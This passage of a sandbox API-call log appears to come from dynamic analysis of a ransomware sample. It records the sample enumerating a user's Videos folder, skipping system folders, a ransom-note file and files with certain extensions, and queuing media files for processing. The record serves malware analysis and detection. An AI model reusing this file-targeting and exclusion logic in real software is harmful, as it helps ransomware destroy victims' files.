psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" [0076.786] SetEvent (hEvent=0x3fc) returned 1 [0076.791] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c650b0, ftCreationTime.dwHighDateTime=0x1d5e2a5, ftLastAccessTime.dwLowDateTime=0xfc35a200, ftLastAccessTime.dwHighDateTime=0x1d5ea0f, ftLastWriteTime.dwLowDateTime=0xfc35a200, ftLastWriteTime.dwHighDateTime=0x1d5ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fc8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="JbkR3ATa90b5U.avi", cAlternateFileName="JBKR3A~1.AVI")) returned 1 [0076.791] StrCmpW (psz1="JbkR3ATa90b5U.avi", psz2=".") returned 1 [0076.791] StrCmpW (psz1="JbkR3ATa90b5U.avi", psz2="..") returned 1 [0076.796] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.796] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.796] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="JbkR3ATa90b5U.avi", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi") returned="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" [0076.796] PathFindExtensionW (pszPath="JbkR3ATa90b5U.avi") returned=".avi" [0076.796] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="bootsect.bak") returned 1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="iconcache.db") returned 1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="thumbs.db") returned -1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2=" ransomware ") returned 1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2=" ransom ") returned 1 [0076.796] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="debug.txt") returned 1 [0076.798] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="boot.ini") returned 1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="desktop.ini") returned 1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="autorun.inf") returned 1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="ntuser.dat") returned -1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="ntldr") returned -1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="ntdetect.com") returned -1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="bootfont.bin") returned 1 [0076.799] StrCmpIW (psz1="JbkR3ATa90b5U.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.799] PathFindExtensionW (pszPath="JbkR3ATa90b5U.avi") returned=".avi" [0076.799] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.799] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.799] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.799] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.799] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.799] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" [0076.799] SetEvent (hEvent=0x3fc) returned 1 [0076.802] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0xc8344370, ftLastAccessTime.dwHighDateTime=0x1d5f03c, ftLastWriteTime.dwLowDateTime=0xc8344370, ftLastWriteTime.dwHighDateTime=0x1d5f03c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ofxv0mmpKK_", cAlternateFileName="OFXV0M~1")) returned 1 [0076.802] StrCmpW (psz1="ofxv0mmpKK_", psz2=".") returned 1 [0076.805] StrCmpW (psz1="ofxv0mmpKK_", psz2="..") returned 1 [0076.805] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.805] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="ofxv0mmpKK_", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system32\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\local\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.805] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\boot\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\perflogs\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\programdata\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\drivers\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\wsus\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="crypt_detect") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="cryptolocker") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="ransomware") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\WINDOWS") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.806] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files") returned 0x0 [0076.806] GetProcessHeap () returned 0xe30000 [0076.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed31f0 [0076.806] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0076.806] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*" [0076.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0xc8344370, ftLastAccessTime.dwHighDateTime=0x1d5f03c, ftLastWriteTime.dwLowDateTime=0xc8344370, ftLastWriteTime.dwHighDateTime=0x1d5f03c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0076.806] StrCmpW (psz1=".", psz2=".") returned 0 [0076.806] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0xc8344370, ftLastAccessTime.dwHighDateTime=0x1d5f03c, ftLastWriteTime.dwLowDateTime=0xc8344370, ftLastWriteTime.dwHighDateTime=0x1d5f03c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.806] StrCmpW (psz1="..", psz2=".") returned 1 [0076.806] StrCmpW (psz1="..", psz2="..") returned 0 [0076.806] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aa47cd0, ftCreationTime.dwHighDateTime=0x1d5eda2, ftLastAccessTime.dwLowDateTime=0x4a2710d0, ftLastAccessTime.dwHighDateTime=0x1d5f0c7, ftLastWriteTime.dwLowDateTime=0x4a2710d0, ftLastWriteTime.dwHighDateTime=0x1d5f0c7, nFileSizeHigh=0x0, nFileSizeLow=0xdae3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9t0zT_40.mkv", cAlternateFileName="")) returned 1 [0076.806] StrCmpW (psz1="9t0zT_40.mkv", psz2=".") returned 1 [0076.806] StrCmpW (psz1="9t0zT_40.mkv", psz2="..") returned 1 [0076.807] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0076.807] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0076.807] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="9t0zT_40.mkv", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" [0076.807] PathFindExtensionW (pszPath="9t0zT_40.mkv") returned=".mkv" [0076.807] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="bootsect.bak") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="iconcache.db") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="thumbs.db") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2=" ransomware ") returned 1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2=" ransom ") returned 1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="debug.txt") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="boot.ini") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="desktop.ini") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="autorun.inf") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="ntuser.dat") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="ntldr") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="ntdetect.com") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="bootfont.bin") returned -1 [0076.807] StrCmpIW (psz1="9t0zT_40.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.807] PathFindExtensionW (pszPath="9t0zT_40.mkv") returned=".mkv" [0076.807] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0076.807] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.807] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.807] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.807] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.807] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" [0076.807] SetEvent (hEvent=0x3fc) returned 1 [0076.811] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x1863cd10, ftLastAccessTime.dwHighDateTime=0x1d5e409, ftLastWriteTime.dwLowDateTime=0x1863cd10, ftLastWriteTime.dwHighDateTime=0x1d5e409, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="a w2nq", cAlternateFileName="AW2NQ~1")) returned 1 [0076.811] StrCmpW (psz1="a w2nq", psz2=".") returned 1 [0076.811] StrCmpW (psz1="a w2nq", psz2="..") returned 1 [0076.811] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0076.811] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0076.815] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="a w2nq", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.816] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system32\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\local\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.821] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\boot\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\perflogs\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\programdata\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\drivers\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\wsus\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="crypt_detect") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="cryptolocker") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="ransomware") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\WINDOWS") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files") returned 0x0 [0076.822] GetProcessHeap () returned 0xe30000 [0076.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d4) returned 0xed56d0 [0076.822] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.822] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\*", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*" [0076.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x1863cd10, ftLastAccessTime.dwHighDateTime=0x1d5e409, ftLastWriteTime.dwLowDateTime=0x1863cd10, ftLastWriteTime.dwHighDateTime=0x1d5e409, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0076.822] StrCmpW (psz1=".", psz2=".") returned 0 [0076.822] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x1863cd10, ftLastAccessTime.dwHighDateTime=0x1d5e409, ftLastWriteTime.dwLowDateTime=0x1863cd10, ftLastWriteTime.dwHighDateTime=0x1d5e409, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.822] StrCmpW (psz1="..", psz2=".") returned 1 [0076.822] StrCmpW (psz1="..", psz2="..") returned 0 [0076.822] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0xb5de8c60, ftLastAccessTime.dwHighDateTime=0x1d5f101, ftLastWriteTime.dwLowDateTime=0xb5de8c60, ftLastWriteTime.dwHighDateTime=0x1d5f101, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0ll0qUCYfiYHKHKER R", cAlternateFileName="0LL0QU~1")) returned 1 [0076.822] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2=".") returned 1 [0076.822] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2="..") returned 1 [0076.822] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.823] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.823] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0ll0qUCYfiYHKHKER R", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system32\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\local\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\boot\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\perflogs\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\programdata\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\drivers\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\wsus\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.823] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="crypt_detect") returned 0x0 [0076.823] StrStrIW 